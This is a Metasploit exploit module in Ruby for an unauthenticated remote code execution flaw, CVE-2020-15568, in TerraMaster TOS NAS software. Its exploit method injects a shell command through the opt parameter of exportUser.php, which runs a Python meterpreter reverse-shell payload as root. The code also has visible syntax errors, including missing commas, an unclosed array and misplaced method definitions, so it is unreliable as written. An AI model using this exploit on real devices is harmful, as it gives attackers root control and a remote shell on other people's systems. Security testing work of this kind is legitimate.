##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "TerraMaster TOS <= 4.1.24 Remote Code Execution",
      'Description'    => %q{
        This module exploits the remote code execution vulnerability of TerraMaster TOS. 
        By exploiting this vulnerability, unauthenticated users can execute
        arbitrary code under the root user.

        A dynamic class method invocation vulnerability exists in file include/exportUser.php which leads to executing remote commands on TerraMaster devices with root privileges.
        The vulnerable file requires several HTTP GET parameters to be provided in order to reach method call and exploit this vulnerability. On first line application includes app.php which autoloads relevant core classes of TOS software.
        The application decides operation based on value of GET parameter type. If value of type variable is something different than 1 or 2, then it’s possible to reach vulnerable code.
        Source code of exportUser.php, application requires HTTP GET parameters cla (shorthand for class), func and opt.
        
        During code review of other files as well, it has been found that there is a way to exploit this issue with pre-existing classes in TOS software.
        PHP Class located in include/class/application.class.php is best candidate to execute commands on devices that runs TOS software.
        Since exportUser.php has no authentication controls, it’s possible for unauthenticated attacker to reach code Execution
        
        This module was tested against 4.1.24 and below versions.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Murat Yilmazlar <murrat@protonmail.com>' # Vulnerability discovery and Metasploit module
          'Canberk Bolat <canberk.bolat@gmail.com>' # Vulnerability discovery
      'References'     =>
        [
          ['CVE', 'CVE-2020-15568']
          ['URL', 'https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/']
        ],
      'DefaultOptions'  =>
      {
        'Payload'  => 'python/meterpreter/reverse_tcp'
      },
      'Platform'       => ['python'],
      'Arch'           => [ ARCH_PYTHON ],
      'Targets'        =>
      [
          ['Automatic Target', {}]
      ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 22 2020",
      'DefaultTarget'  => 0
    ))

    register_options(
        [
            Opt::RPORT(8181),
            OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/include'])
        ]
    )

    def check
      res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path,"/exportUser.php")
      },60)

      if res && res.body.include?('Fatal error: Uncaught Error: Class name must be a valid object')
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    end

    def exploit
      print_status("Attempting to execute the payload...")
      check
      res = send_request_cgi(
          {
              'method' => 'GET',
              'uri' => normalize_uri(target_uri.path, 'exportUser.php'),
              'vars_get' => {
                  'type' => "3",
                  'cla' => "application",
                  'func' => "_exec",
                  'opt' => "1'| python -c \"#{payload.encoded}\" | grep '1"
              }
          })
    end
  end
end